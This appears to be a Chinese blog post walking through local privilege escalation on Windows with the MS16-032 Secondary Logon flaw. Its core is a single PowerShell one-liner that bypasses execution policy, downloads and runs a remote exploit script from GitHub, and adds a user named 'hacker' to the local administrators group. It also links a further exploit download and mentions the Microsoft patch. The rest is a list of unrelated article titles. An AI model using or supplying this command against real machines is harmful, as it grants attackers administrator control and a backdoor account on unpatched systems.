exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是见证奇迹的时刻了

该漏洞危害十分严重,如图在2008server上测试

本地测试如图,被安全软件检测到。

微软官方在2016年3月8日发布了补丁KB3139914。

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

最新文章

  1. 相机标定简介与MatLab相机标定工具箱的使用(未涉及原理公式推导)
  2. Linux Shell shortcut
  3. $("").click与onclick的区别示例介绍
  4. JS添加删除DIV
  5. CEF3开发者系列之进程和线程
  6. Oracle常用操作-----(一)
  7. CK13物料价格评估的数据ALV显示
  8. WinStore开发知识导航集锦
  9. WebSockets基础
  10. HDU 4351 Digital root 线段树区间合并
  11. 写给系统管理员的25个PHP安全实践
  12. FreeMarker中if标签内的判断条件
  13. [转] windows7 IIS管理器 在计算机“.”上没有找到WAS服务
  14. centos上安装jdk环境
  15. 慎用StringEscapeUtils.escapeHtml步骤
  16. jQuery实现页面关键字搜索
  17. ZOJ 3623 Battle Ships 简单DP
  18. [国嵌攻略][165][usb下载线驱动设计]
  19. 安装QT5.02
  20. C++ Primer 笔记——const 限定符

热门文章

  1. Hive:解决Hive创建文件数过多的问题
  2. MVC 实用架构设计(〇)——总体设计
  3. C语言保证,0永远不是有效的数据地址,因此,返回址0可用来表示发生的异常事件
  4. 读书笔记-iOS核心动画高级技巧
  5. ORACLE监听配置及测试实验(2)
  6. pycharm换行
  7. [phomeflashpic]怎样调用帝国CMS图片幻灯效果
  8. CentOS安装python3.5.0+uwsgi+nginx
  9. NYOJ 迷宫寻宝(一)
  10. 导出mysql数据库数据